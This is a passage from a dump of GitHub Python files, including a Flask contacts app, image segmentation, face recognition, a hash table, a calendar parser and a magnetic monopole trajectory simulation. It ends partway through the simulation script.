    \r\n About\r\n Search\r\n Add json\r\n Remove json\r\n \"\"\"\r\n\r\n@app.route(\"/about/\")\r\n@app.route(\"/about/\")\r\ndef about(id=0):\r\n if id == 0:\r\n return contacts\r\n elif 0 < id /\")\r\ndef add_json(name,age):\r\n contacts.append({\"name\":name, \"age\":age})\r\n save()\r\n return contacts\r\n\r\n\r\n@app.route(\"/search\")\r\n@app.route(\"/search/\")\r\ndef search(name):\r\n for contact in contacts:\r\n if contact[\"name\"] == name:\r\n return contacts\r\n \r\n\r\n\r\n@app.route(\"/remove-json\")\r\n@app.route(\"/remove-json/\")\r\ndef remove_json(name):\r\n for contact in contacts:\r\n if contact[\"name\"] == name:\r\n contacts.remove(contact)\r\n save()\r\n return contacts\r\n\r\n\r\napp.run(debug=True)\r\n","repo_name":"matan922/hw1","sub_path":"amain.py","file_name":"amain.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26985327621","text":"from skimage import data, io, segmentation, color\nfrom skimage.future import graph\nimport numpy as np\nimport cv2\n\ndef weight_mean_color(graph, src, dst, n):\n d = graph.node[dst]['mean color'] - graph.node[n]['mean color']\n d = np.linalg.norm(d)\n return {'weight': d}\ndef merge_mean_color(graph, src, dst):\n graph.node[dst]['total color'] += graph.node[src]['total color']\n graph.node[dst]['pixel count'] += graph.node[src]['pixel count']\n graph.node[dst]['mean color'] += graph.node[dst]['total color'] / graph.node[dst]['pixel count']\n\n#main\n#img = data.coffee()\nimg = io.imread(\"C:\\\\Users\\\\shyam\\\\Downloads\\\\quiz_bg2.png\")\nimg = cv2.resize(img, (1024, 1024))\nlabels = segmentation.slic(img, compactness=30, n_segments=400)\ng = graph.rag_mean_color(img, labels)\n#print(g)\nnew_labels = graph.merge_hierarchical(labels, g, thresh=35, rag_copy=False, in_place_merge=True,\n merge_func=merge_mean_color, weight_func=weight_mean_color)\nprint(new_labels)\nimg_out = color.label2rgb(new_labels, img, kind='avg')\nimg_out = segmentation.mark_boundaries(img_out, new_labels, (0,0,0))\nio.imshow(img)\nio.show()\nio.imshow(img_out)\nio.show()\n\nfor (i, segVal) in enumerate(np.unique(new_labels)):\n print(i, segVal)\n mask = np.zeros(img_out.shape[:2], dtype=\"uint8\")\n mask[new_labels == segVal] = 255\n print(mask);break\n '''cv2.imshow(\"Mask\", mask)\n cv2.imshow(\"Applied\", cv2.bitwise_and(img_out, img_out, mask = mask))\n cv2.waitKey(0)'''","repo_name":"shyamsuresh14/ImageSegmentationAndAnalysis","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"5364170238","text":"\ndef sum_2_nums(a,b):\n if a == '' and b == '':\n print(\"输入信息非法,请重新输入\")\n exit()\n else:\n result = a+b\n print(\"%d+%d=%d\"%(a,b,result))\n \n\n\n\n\n\n\n\nnum1 = int(input(\"请输入第1个数字:\"))\nnum2 = int(input(\"请输入第2个数字:\"))\n'''if num2 != int:\n print(\"输入信息非法,请重新输入\")'''\n\n\nsum_2_nums(num1,num2)\n","repo_name":"zhangsanjin3355/zxpython","sub_path":"32-带有参数的函数.py","file_name":"32-带有参数的函数.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42172691080","text":"import face_recognition as fr\nimport os\nimport cv2\nimport face_recognition\nimport numpy as np\nfrom time import sleep\n\n\ndef get_encoded_faces():\n\n encoded = {}\n\n for dirpath, dnames, fnames in os.walk(\"./face_repository\"):\n for f in fnames:\n if f.endswith(\".jpg\") or f.endswith(\".png\"):\n face = fr.load_image_file(\"face_repository/\" + f)\n encoding = fr.face_encodings(face)[0]\n encoded[f.split(\".\")[0]] = encoding\n\n return encoded\n\n\ndef unknown_image_encoded(img):\n\n face = fr.load_image_file(\"face_repository/\" + img)\n encoding = fr.face_encodings(face)[0]\n\n return encoding\n\n\ndef classify_face(im):\n \n faces = get_encoded_faces()\n faces_encoded = list(faces.values())\n known_face_names = list(faces.keys())\n\n img = cv2.imread(im, 1)\n \n face_locations = face_recognition.face_locations(img)\n unknown_face_encodings = face_recognition.face_encodings(img, face_locations)\n\n face_names = []\n for face_encoding in unknown_face_encodings:\n \n matches = face_recognition.compare_faces(faces_encoded, face_encoding)\n name = \"Unknown\"\n\n \n face_distances = face_recognition.face_distance(faces_encoded, face_encoding)\n best_match_index = np.argmin(face_distances)\n if matches[best_match_index]:\n name = known_face_names[best_match_index]\n\n face_names.append(name)\n\n for (top, right, bottom, left), name in zip(face_locations, face_names):\n \n cv2.rectangle(img, (left-20, top-10), (right+20, bottom+15), (300, 0, 0), 2)\n\n \n cv2.rectangle(img, (left-20, bottom -10), (right+20, bottom+15), (500, 0, 0), cv2.FILLED)\n font = cv2.FONT_HERSHEY_DUPLEX\n cv2.putText(img, name, (left -10, bottom + 10), font, 0.5, (300, 300, 300), 1)\n\n\n \n while True:\n\n cv2.imshow('Whom are you looking for?', img)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n return face_names \n\n\nprint(classify_face(\"test1.jpg\")) # You can either try to find people \"test2.jpg\" or \"test1.jpg\" in the string.\n","repo_name":"serhanelmacioglu/Face-Recognition_Coding-with-Python","sub_path":"face.py","file_name":"face.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"34167904752","text":"class HashItem:\n def __init__(self, key, value): #we create a class for holding hash table items\n self.key = key\n self.value = value\nclass HashTable: #starting with a constructor, the hash table\n def __init__(self):\n self.size = 256\n self.slots= [None for i in range(self.size)]\n self.count = 0\n def _hash(self, key):\n mult=1\n hv = 0\n for ch in key:\n hv += mult * ord(ch)\n mult += 1\n return hv % self.size\n def put(self, key, value):\n item = HashItem(key, value)\n h = self._hash(key)\n while self.slots[h] is not None:\n if self.slots[h].key is key:\n break\n h = (h+1) % self.size\n if self.slots[h] is None:\n self.count +=1\n self.slots[h] = item\n def get(self, key):\n h= self._hash(key)\n while self.slots[h] is not None:\n if self.slots[h].key is key:\n return self.slots[h].value\n h = (h+1) % self.size\n return None\n \n def __setitem__(self, key, value):\n self.put(key, value)\n def __getitem__(self, key):\n return self.get(key)\n\n\n\n\n\n\nht = HashTable()\nht[\"goods\"] = \"eggs\"\nht[\"better\"] = \"ham\"\n\nfor key in (\"goods\" , \"better\"):\n v=ht.get(key)\n print(v)","repo_name":"vantage-ola/data_structures_algorithms","sub_path":"Python/Hashing/hashtable.py","file_name":"hashtable.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35512175856","text":"import re\r\nimport string\r\nfrom helper import *\r\n\r\n# title, location, month, day, starthour, endhour,startmin, endmin\r\ndef lineProcessor(lineList):\r\n eventsList = []\r\n lastLocation =-1\r\n content = []\r\n for i in range(0, len(lineList)):\r\n m = re.search(\"Location:.*\", lineList[i])\r\n \r\n if m and lastLocation ==-1:\r\n location = m.group(0).split(':')[1].strip()\r\n clock = lineList[i - 1].replace(\"Time:\", \"\").strip()\r\n title = lineList[i -3].strip()\r\n date = lineList[i - 2].replace(\"Date:\",\"\").strip()\r\n\r\n time1 = dateExtract(date)\r\n MM,DD = time1\r\n MM = TwoDigit(MM)\r\n DD = TwoDigit(DD)\r\n #print time1\r\n time2 = clockExtract(clock)\r\n start_HH, end_HH,start_MM, end_MM = time2\r\n start_HH = TwoDigit(start_HH)\r\n end_HH = TwoDigit(end_HH)\r\n start_MM = TwoDigit(start_MM)\r\n end_MM = TwoDigit(end_MM)\r\n #time = timeExtractSEASGEN(rawTime)\r\n\r\n lastLocation = i + 1\r\n \r\n \r\n elif m and lastLocation !=-1:\r\n \r\n \r\n content = lineList[lastLocation:i-4]\r\n lastLocation =i + 1\r\n\r\n #print title\r\n #print ('\\n')\r\n #print date\r\n #print ('\\n')\r\n #print clock\r\n #print ('\\n')\r\n #print location\r\n #print ('\\n')\r\n #print content\r\n #print ('\\n')\r\n \r\n #eventsList.append((title, date, clock, location, content))\r\n #eventsList.append((title, time1,time2, location, content))\r\n eventsList.append((title, location,MM,DD,start_HH, end_HH,start_MM, end_MM, content))\r\n\r\n location = m.group(0).split(':')[1].strip()\r\n clock = lineList[i - 1].replace(\"Time:\", \"\").strip()\r\n title = lineList[i -3].strip()\r\n date = lineList[i - 2].replace(\"Date:\",\"\").strip()\r\n time1 = dateExtract(date)\r\n MM,DD = time1\r\n MM = TwoDigit(MM)\r\n DD = TwoDigit(DD)\r\n \r\n #print time1\r\n time2 = clockExtract(clock)\r\n start_HH, end_HH,start_MM, end_MM = time2\r\n start_HH = TwoDigit(start_HH)\r\n end_HH = TwoDigit(end_HH)\r\n start_MM = TwoDigit(start_MM)\r\n end_MM = TwoDigit(end_MM)\r\n #print time2\r\n #lastLocation =i+3\r\n\r\n \r\n \r\n \r\n #time = timeExtract(rawTime)\r\n\r\n \r\n\r\n content = lineList[lastLocation:]\r\n \r\n \r\n #eventsList.append((title, time1, time2, location, content))\r\n eventsList.append((title, location,MM,DD,start_HH, end_HH,start_MM, end_MM, content))\r\n #print eventsList\r\n \r\n return eventsList\r\n \r\n \r\n\r\n## content = lineList[lastLocation:]\r\n## eventsList.append((title, time, locatison, content))\r\n \r\n \r\ndef dateExtract(date):\r\n if re.search(\"th\", date):\r\n day = date.split(',')[1].strip() \r\n MM = charToNum(day.split(' ')[0])\r\n MM = TwoDigit(MM)\r\n DD = day.split(' ')[1].replace(\"th\", \"\").strip()\r\n DD = TwoDigit(DD)\r\n return MM, DD \r\n MM = charToNum('January')\r\n DD = charToNum('January')\r\n MM = TwoDigit(MM)\r\n DD = TwoDigit(DD)\r\n return MM, DD \r\n\r\n\r\ndef clockExtract(clock):\r\n if re.search(\":*-*:\", clock): \r\n flag_start = 0\r\n flag_end = 0\r\n start_time = clock.split('-')[0] \r\n end_time = clock.split('-')[1] \r\n if start_time.find('pm'): \r\n start_time = start_time.replace('pm','') \r\n flag_start = 1\r\n else: \r\n start_time =start_time.replace('am','') \r\n \r\n if end_time.find('PM'): \r\n end_time =end_time.replace('pm','') \r\n flag_end = 1\r\n else: \r\n end_time =end_time.replace('am','') \r\n \r\n if(flag_start ==1): \r\n start_HH = TwlToTwen(start_time.split(':')[0]) \r\n \r\n start_MM = start_time.split(':')[1].strip() \r\n \r\n if(flag_end ==1): \r\n end_HH = TwlToTwen(end_time.split(':')[0]) \r\n end_MM = end_time.split(':')[1].strip()\r\n #if re.search(\"*am*\", start_MM):start_MM = start_MM.replace(\"am\", \"\").strip()\r\n if \"am\" in start_MM:\r\n start_MM = start_MM.replace(\"am\", \"\").strip()\r\n start_HH = str(int(start_HH) - 12) \r\n return start_HH, end_HH,start_MM, end_MM\r\n start_HH = '00'\r\n end_HH = '00'\r\n start_MM = '00'\r\n end_MM = '00'\r\n return start_HH, end_HH,start_MM, end_MM\r\n\r\n##def charToNum(x): \r\n## ''' Change month format from char to digit'''\r\n## #Strips leading/trailing white space form x \r\n## x= x.strip() \r\n## return { \r\n## 'January': 1, \r\n## 'February': 2, \r\n## 'March': 3, \r\n## 'April': 4, \r\n## 'May': 5, \r\n## 'June': 6, \r\n## 'July': 7, \r\n## 'August': 8, \r\n## 'September': 9, \r\n## 'October': 10, \r\n## 'Novermber': 11, \r\n## 'December': 12, \r\n## }.get(x, 0) \r\n \r\n\r\n##def TwlToTwen(x): \r\n## ''' Change time format from 12hour to 24 hour'''\r\n## #Strips leading/trailing white space form x \r\n## x=x.strip() \r\n## return{ \r\n## '1': 13, \r\n## '2': 14, \r\n## '3': 15, \r\n## '4': 16, \r\n## '5': 17, \r\n## '6': 18, \r\n## '7': 19, \r\n## '8': 20, \r\n## '9': 21, \r\n## '10': 22, \r\n## '11': 23, \r\n## }.get(x,12) \r\n\r\n\r\n\r\n#def main():\r\n #f = open(\"gse.txt\")\r\n #psg = f.readlines()\r\n #print lineProcessorSEASGEN(psg)\r\n #lineProcessorSEASGEN(psg)\r\n #for i in range(0, len(eventsList)):\r\n #print eventsList[i]\r\n \r\n \r\n\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"nevsaynev/Penn-Assignment-2nd-Year","sub_path":"PennCalendar/data_seasGen_2.py","file_name":"data_seasGen_2.py","file_ext":"py","file_size_in_byte":5776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23892430244","text":"import sys\nfrom PyQt5 import QtWidgets\nfrom table import Table\nfrom solution import Solution\nfrom first_window import Ui_FirstWindow\nfrom second_window import Ui_SecondWindow\n\n\nt = Table()\ns = Solution(t)\napp = QtWidgets.QApplication(sys.argv)\nMainWindow = QtWidgets.QMainWindow()\nui = Ui_FirstWindow(t, s, lambda: open_second_window())\nui.setupUi(MainWindow)\nMainWindow.show()\n\n\ndef open_second_window():\n global SecondWindow\n SecondWindow = QtWidgets.QMainWindow()\n sw = Ui_SecondWindow(ui.t, ui.s)\n sw.setupUi(SecondWindow)\n MainWindow.close()\n SecondWindow.show()\n\n def return_to_first_window():\n SecondWindow.close()\n MainWindow.show()\n\n sw.push_button_back.clicked.connect(return_to_first_window)\n\n\nsys.exit(app.exec_())\n","repo_name":"BychkovArthur/minimal-DNF","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22125759228","text":"#Tracking Magnetic Monopoles Through the Galaxy:\n#input starting conditions into the program and it will track the magnetic monopole's path through the bfield.\n\n#Bfield given by \"A New Model of the Galatic Magnetic Field\" Jansson, Farrar (2012).\n#Mass bounds from \"Signatures for a Cosmic Flux of Magnetic Monopoles\" Wick (2002) are 40TeV <~ M <~ 10^8TeV.\n#Wick(2002) has more information on likely mass values.\n\n#units used are all SI units except: distance is in kpc, and angles are in degrees, magnetic field strength is in microgauss.\n\n#variable names generally match those in the Bfield paper.\n\nfrom __future__ import print_function, division\nimport math\nimport numpy as np\nimport sys\nimport random\nimport datetime\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n#=======CONSTANT PARAMETERS=======\nc=29979245800.0 #light speed in cm/s\nexitstatus=True #did it leave the 20kpc sphere by the end of the program?\nnameofscript=\"mpoles15_graphed\" #name of the output file\n\nkpctocm=3.08567758e21\ncmtokpc=3.2407793e-22\nmicroGtoG=1e-6\nGeVtog=1.78266184e-24\n\n#=======DEFAULT STARTING CONDITIONS=======\nq_b=3.29106e-8 #the magnetic charge of the particle in Ampere*kpc by dirac quantization cond.\nm=1e13*GeVtog #mass (g, enter in GeV). An estimate from Wick (2002).\ndt=1.0e19 #the timestep (smaller = more accuracy, more computing time) in seconds\ndistance_to_halt= 40.0*kpctocm #when to stop the program if it doesn't leave r>20kpc\n\npos_0=np.array([-8.5*kpctocm, 0.0, 0.0]) #starting position (kpc), position of earth is x=-8.33937979kpc\n#vel_0=np.array([0.0, 0.0, -30000]) #starting velocity (cm/s)\nV=0.0\nTHETA=0.0 #theta is the polar angle\nPHI=0.0 #phi is the azimuthal angle\n\n\n\n#=======INPUTTED STARTING CONDITIONS=======\n#if sys.argv[1]!=\"N\":\n# q_b=float(sys.argv[1])\n#if sys.argv[2]!=\"N\":\n# m=float(sys.argv[2])\n#if sys.argv[3]!=\"N\":\n# posx=float(sys.argv[3])\n#if sys.argv[4]!=\"N\":\n# posy=float(sys.argv[4])\n#if sys.argv[5]!=\"N\":\n# posz=float(sys.argv[5])\n#if sys.argv[6]!=\"N\":\n# distance_to_halt=float(sys.argv[6])\n#if sys.argv[7]!=\"N\":\n# dt=float(sys.argv[7])\n#if sys.argv[8]!=\"N\":\n# V=float(sys.argv[8])\n#if sys.argv[9]!=\"N\":\n# THETA=float(sys.argv[9])\n#if sys.argv[10]!=\"N\":\n# PHI=float(sys.argv[10])\n\n#=======DISK PARAMETERS, WITH B IN Gauss. Converted to Tesla when field is calculated=======\nb1=0.1*microGtoG\nb2=3.0*microGtoG\nb3=-0.9*microGtoG\nb4=-0.8*microGtoG\nb5=-2.0*microGtoG\nb6=-4.2*microGtoG\nb7=0.0\nb8=2.7*microGtoG\nb_ring=0.1*microGtoG\nh_disk=0.4*microGtoG\nw_disk=0.27*microGtoG\n\n#=======HALO PARAMETERS & FUNCTIONS=======\nB_n=1.4*microGtoG\nB_s=-1.1*microGtoG\nr_n=9.22*kpctocm\nr_s=16.7*kpctocm #NOTE: parameter has a large error.\nw_h=0.2*kpctocm\nz_0=5.3*kpctocm\ni=np.radians(11.5) #this is the opening \"pitch\" angle of the logarithmic spiral boundaries.\nr_negx=np.array([5.1, 6.3, 7.1, 8.3, 9.8, 11.4, 12.7, 15.5]) #these are the radii at which the spirals cross the x-axis\n\ndef r_i(T,I): #halo spiral boundary function\n return r_negx[I]*np.e**((T-np.pi)*np.tan(i))\n \ndef subregioncheck(r,theta,i1,i2):\n if r>r_i(theta,i1) and rr_i(theta-2*np.pi,i1) and rr_i(theta,i1) and rr_i(theta+2*np.pi,i1) and rr_i(theta-2*np.pi,i1) and rr_i(theta,i1) and rr_i(theta+2*np.pi,i1) and r= np.tan(Theta0_X)*(R-rc_X):\n return R*rc_X/(rc_X+abs(Z)/np.tan(Theta0_X))\n\n else:\n return R-abs(Z)/np.tan(Theta0_X)\n\ndef b_Xf(R_P):\n return B_X*np.e**(-R_P/r_X)\n\n#def Theta_X(R,Z):\n# if abs(Z)>=np.tan(Theta0_X)*np.sqrt(R)-np.tan(Theta0_X)*rc_X:\n# return np.arctan(abs(Z)/(R-r_p(R,Z))) #think about atan and maybe problems with quadrants\n# else:\n# return Theta0_X\n\n#striation parameters (the striated field is currently unused)\n#gamma= 2.92\n#alpha= 2.65 #taken from page 9, top right paragraph\n#beta= gamma/alpha-1\n\n#=======OTHER PRELIMINARY DEFINITIONS=======\n\ndef mag(V):\n return np.sqrt(V[0]**2+V[1]**2+V[2]**2)\n \ndef Theta(X,Y): #this theta goes from 0 to 2pi\n if X == 0.0:\n if Y > 0.0:\n return np.pi/2\n if Y < 0.0:\n return 3.0*np.pi/2\n else:\n return 0\n else:\n if Y < 0.0:\n return np.arctan2(Y,X)+2*np.pi\n else:\n return np.arctan2(Y,X)\n \n \ndef Gam(V):\n return (1.0-(mag(V)/c)**2)**(-0.5)\n \n #check the KE\ndef KE(VEL):\n if Gam(VEL) != 1:\n return m*c**2*(Gam(VEL)-1) #KE, ergs\n else:\n return 0.5*m*mag(VEL)**2\n \n \n\ndef gettimestd():\n output=\"\"\n W=str(datetime.datetime.now())\n for n in [2,3,5,6,8,9]:\n output+=W[n]\n output+=\"_\"\n for n in range(11,13):\n output+=W[n]\n output+=\".\"\n for n in range(14,16):\n output+=W[n]\n output+=\".\"\n for n in range(17,23):\n output+=W[n]\n return output\n \ndef gettimesecs():\n W=str(datetime.datetime.now())\n tsecs=0.0\n tsecs+=float(W[0]+W[1]+W[2]+W[3])*31556926\n tsecs+=float(W[5]+W[6])*2629743.83\n tsecs+=float(W[8]+W[9])*86400\n tsecs+=float(W[11]+W[12])*3600\n tsecs+=float(W[14]+W[15])*60\n tsecs+=float(W[17]+W[18])*1\n tsecs+=float(\"0.\"+W[20]+W[21]+W[22]+W[23]+W[24])\n return tsecs\n \ndef get_B(pos):\n r=np.sqrt(pos[0]**2.0+pos[1]**2.0)\n theta=Theta(pos[0],pos[1])\n r_p=R_p(r,pos[2])\n b_X=b_Xf(r_p)\n bfield=np.array([0.0, 0.0, 0.0]) #0 for r>1, <20\n \n if mag(pos) > 1.0*kpctocm and r<20*kpctocm and r!=0:\n phi_hat=np.array([-pos[1]/r, pos[0]/r, 0.0])\n \n# #halo:\n if pos[2] >= 0.0:\n bfield = np.e**(-abs(pos[2])/z_0)*L(pos[2],h_disk,w_disk)* B_n*(1-L(r,r_n,w_h)) * phi_hat\n\n else:\n bfield = np.e**(-abs(pos[2])/z_0)*L(pos[2],h_disk,w_disk)* B_s*(1-L(r,r_s,w_h)) * phi_hat\n \n \n# #X-field: \n if pos[2] != 0: \n \n bhat_X=(pos[2]**2+(r-r_p)**2)**(-0.5)*np.array([pos[0]*(r-r_p)/r, pos[1]*(r-r_p)/r, pos[2]])\n if pos[2]<0:\n bhat_X*=-1\n \n if abs(r_p) < rc_X:\n bfield += b_X*(r_p/r)**2*bhat_X\n\n if abs(r_p) >= rc_X:\n bfield += b_X*(r_p/r)*bhat_X\n else:\n bfield +=b_X*np.array([0,0,1])\n \n #disk:\n if r>= 3.0*kpctocm and r < 5.0*kpctocm :\n bfield+=b_ring*(1-L(pos[2],h_disk,w_disk))*phi_hat\n \n if r>=5.0*kpctocm:\n if regioncheck(r,theta,7,0): #region 1\n bfield+=(b1/r)*(1.0-L(pos[2],h_disk,w_disk))*np.array([np.sin(theta+i),-np.cos(theta+i),0.0])\n \n elif regioncheck(r,theta,0,1): #region 2\n bfield+=(b2/r)*(1.0-L(pos[2],h_disk,w_disk))*np.array([np.sin(theta+i),-np.cos(theta+i),0.0])\n \n elif regioncheck(r,theta,1,2): #region 3\n bfield+=(b3/r)*(1.0-L(pos[2],h_disk,w_disk))*np.array([np.sin(theta+i),-np.cos(theta+i),0.0])\n \n elif regioncheck(r,theta,2,3): #region 4\n bfield+=(b4/r)*(1.0-L(pos[2],h_disk,w_disk))*np.array([np.sin(theta+i),-np.cos(theta+i),0.0])\n \n elif regioncheck(r,theta,3,4): #region 5\n bfield+=(b5/r)*(1.0-L(pos[2],h_disk,w_disk))*np.array([np.sin(theta+i),-np.cos(theta+i),0.0])\n \n elif regioncheck(r,theta,4,5): #region 6\n bfield+=(b6/r)*(1.0-L(pos[2],h_disk,w_disk))*np.array([np.sin(theta+i),-np.cos(theta+i),0.0])\n \n elif regioncheck(r,theta,5,6): #region 7\n bfield+=(b7/r)*(1.0-L(pos[2],h_disk,w_disk))*np.array([np.sin(theta+i),-np.cos(theta+i),0.0])\n \n elif regioncheck(r,theta,6,7): #region 8\n bfield+=(b8/r)*(1.0-L(pos[2],h_disk,w_disk))*np.array([np.sin(theta+i),-np.cos(theta+i),0.0])\n \n elif pos[2]==2:\n print(\"=====NO REGION FOUND! BUG IN PROGRAM!!!=====\")\n print(\"pos:\",pos, end=\"\\n \\n \")\n try:\n global posbug_list\n posbug_list+=[[x for x in pos]]\n except NameError:\n posbug_list=[[x for x in pos]]\n global posbug_list\n \n \n return bfield\n\n#FIND THE MAXIMUM B MAGNITUDE ON An XY CROSS SECTION (debug)\n#maxB=0.0\n#for xxx in np.linspace(-20*kpctocm,20*kpctocm,num=200):\n# for yyy in np.linspace(-20*kpctocm,20*kpctocm,num=200):\n# if mag(get_B([xxx,yyy,.01]))>maxB:\n# maxB=mag(get_B([xxx,yyy,.01]))\n#print(\"MAXB IS\",maxB)\n\ndef acc_relativistic(pos,vel): #returns relativistic acceleration. only necessary for large velocity.\n bfield=get_B(pos)\n gam=Gam(vel)\n force = q_b*bfield #In dynes\n acc=(gam*m*c**2)**(-0.5)*(c**2*force - np.dot(force,vel)*vel)\n return acc\n \ndef acc_classical(pos):\n bfield=get_B(pos)\n acc = bfield*(q_b/m)\n return acc\n \n#idea: make a relativistic and nonrel paradigm. when the speed is nonrel (difference\n#would be less than machine precision) relativistic=False. Every X iterations, check if \n#the paradigm should be changed, where X is the least number of iterations it would take\n#to change the velocity by, say, 1% of the speed of light.\n\n\ntzero=gettimesecs()\n\ng=open(nameofscript+\"_full_output\"+str(gettimestd())+\".txt\",\"a\")\n\n#=======PROGRAM BEGINS=======\n\n#for V in [30000]:\n# for THETA in [-np.pi/2, 0, np.pi/2]:\n# for PHI in [0, np.pi/2, np.pi, 3*np.pi/2]:\ntstartsecs=gettimesecs()\ntstartstd=gettimestd()\n\nprint(\"=======started at\",tstartstd,\"with V,THETA,PHI as\",V,THETA,PHI,\"=======\\n\")\n\na=nameofscript+gettimestd()+\".txt\"\nf = open(a, 'a')\n\n\nvel_0=V*np.array([np.sin(THETA)*np.cos(PHI), np.sin(THETA)*np.sin(PHI), np.cos(THETA)])\n\npos=np.array([0.0, 0.0, 0.0])\nvel=np.array([0.0, 0.0, 0.0])\n\nfor n in [0,1,2]:\n pos[n], vel[n]=pos_0[n], vel_0[n]\n\nf.write(\"\\n=====STARTING CONDITIONS FOR RUN \"+str(V)+str(THETA)+str(PHI)+\" ===== vel_0:\\n\")\nf.write(np.array_str(vel_0)+\"\\n\")\nf.write(\"mag(vel_0):\\n\")\nf.write(str(mag(vel_0))+\"\\n\")\nf.write(\"mag(vel_0)/c\\n\")\nf.write(str(mag(vel_0)/c)+\"\\n\")\nf.write(\"THETA_0\\n\")\nf.write(str(THETA)+\"\\n\")\nf.write(\"PHI_0\\n\")\nf.write(str(PHI)+\"\\n\")\nf.write(\"q_b\\n\")\nf.write(str(q_b)+\"\\n\")\nf.write(\"m\\n\")\nf.write(str(m)+\"\\n\")\nf.write(\"dt\\n\")\nf.write(str(dt)+\"\\n\")\nf.write(\"distance to halt\\n\")\nf.write(str(distance_to_halt)+\"\\n\")\n\nmaxvelocity=mag(vel)\ndistance_tracked=0.0 #set the distance travelled so far to 0\ntime=0.0\niterations=0\narclength_in_rho1kpc_region=0.0\n\n#FOR GRAPHING:\nxlist, ylist, zlist=[np.array([]) for _ in range(3)]\n\nwhile mag(pos) < 20.0*kpctocm and distance_tracked < distance_to_halt:\n iterations+=1\n print(\"vel:\",vel)\n print(\"magvel:\",mag(vel))\n print(\"magvel/c:\",mag(vel)/c)\n \n acc=acc_relativistic(pos,vel)\n k1=np.array([-vel*dt, -acc_relativistic(pos, vel)*dt ])\n print(\"k1:\",k1)\n print(\"magvelnew:\",vel+k1[1]/2.0)\n print(\"magvelnew/c:\",(vel+k1[1]/2.0)/c)\n k2=np.array([-(vel+k1[1]/2.0)*dt, -acc_relativistic(pos+k1[0]/2.0, vel+k1[1]/2.0)*dt ])\n print(\"k1 ver 2:\",k1)\n k3=np.array([-(vel+k2[1]/2.0)*dt, -acc_relativistic(pos+k2[0]/2.0, vel+k2[1]/2.0)*dt ])\n k4=np.array([-(vel+k3[1])*dt, -acc_relativistic(pos+k3[0], vel+k3[1])*dt ])\n \n pos_step=(k1[0] + 2*k2[0] + 2*k3[0] + k4[0])/6.0\n \n #tested: mutability of np array does not mess this up (changing vel, pos does not chg k1)\n vel+=(k1[1] + 2*k2[1] + 2*k3[1] + k4[1])/6.0\n \n pos+=pos_step\n distance_tracked += mag(pos_step)\n \n #FOR GRAPHING:\n xlist=np.concatenate((xlist,np.array([pos[0]])))\n ylist=np.concatenate((ylist,np.array([pos[1]])))\n zlist=np.concatenate((zlist,np.array([pos[2]])))\n \n \n \n #here, we adjust the timestep so that: \n #1. the velocity changes by .001% every iteration (hence the 0.00001)\n #2. the change in distance is never greater than 0.01kpc in one iteration (hence the 0.01). equation comes from v^2=v_0^2 + 2a(dx)\n# dt=min([1e50, abs((1/mag(acc))*(mag(vel)+np.sqrt(mag(vel)**2+2*mag(acc)*0.01))) ]) #.000001*mag(vel)/mag(acc)\n# print(\"dt is\",dt)\n# print(\"dt choices were:\",.000001*mag(vel)/mag(acc), abs((1/mag(acc))*(mag(vel)+np.sqrt(mag(vel)**2+2*mag(acc)*0.01))))\n# print()\n# print(\"pos mag is \",mag(pos))\n# print(\"vel mag/c is\",mag(vel)/c)\n# print(\"acc mag/c is\",mag(acc)/c)\n# print()\n \n #EULER METHOD\n# pos += -vel*dt - 0.5*acc*dt**2\n# \n# vel += -acc*dt #this is the time-forwards velocity\n \n if mag(vel)>c:\n g.open(\"SPEED ERROR \"+a,\"a\")\n g.write(\"beta was \"+str(mag(vel)/c))\n print(\"SPEED ERROR. beta was \"+str(mag(vel)/c))\n raise SystemExit()\n \n if iterations%20000==1:\n print(\"============done with iteration no.\",iterations,\"============\")\n print(\"pos: \", pos,\"\\n\")\n \n print(\"vel/c: \",vel/c)\n print(\"|vel/c|: \",mag(vel)/c,\"\\n\")\n \n print(\"acc: \", acc)\n print(\"|acc|: \",mag(acc),\"\\n\")\n \n print(\"bfield: \",get_B(pos))\n print(\"|bfield|: \",mag(get_B(pos)))\n print()\n print(\"displacement: \", mag(pos-pos_0),\"kpc\")\n print(\"arc length traversed: \",distance_tracked,\"kpc\")\n print(\"simulated time: \",-iterations*dt,\"seconds.\")\n print()\n print(\"runtime so far: \",gettimesecs()-tstartsecs,\"real seconds\")\n print(\"\\n \\n\")\n \n if mag(pos)<1:\n arclength_in_rho1kpc_region+=pos_step\n \ndistance_from_start=np.sqrt( (pos[0]-pos_0[0])**2 +(pos[1]-pos_0[1])**2 +(pos[2]-pos_0[2])**2)\ntheta_f=np.arccos(pos[2]/mag(pos))\nphi_f = Theta(pos[0],pos[1])\n\nif mag(pos)<20*kpctocm:\n exitstatus=False\n\nf.write(\"===FINAL CONDITIONS=== vel:\\n\")\nf.write(np.array_str(vel)+\"\\n\")\nf.write(\"mag(vel)\\n\")\nf.write(str(mag(vel))+\"\\n\")\nf.write(\"mag(vel)/c\\n\")\nf.write(str(mag(vel)/c)+\"\\n\")\nf.write(\"pos\\n\")\nf.write(np.array_str(pos)+\"\\n\")\nf.write(\"mag(pos)\\n\")\nf.write(str(mag(pos))+\"\\n\")\nf.write(\"theta_f\\n\")\nf.write(str(theta_f)+\"\\n\")\nf.write(\"phi_f\\n\")\nf.write(str(phi_f)+\"\\n\")\nf.write(\"distance tracked\\n\")\nf.write(str(distance_tracked)+\"\\n\")\nf.write(\"distance from 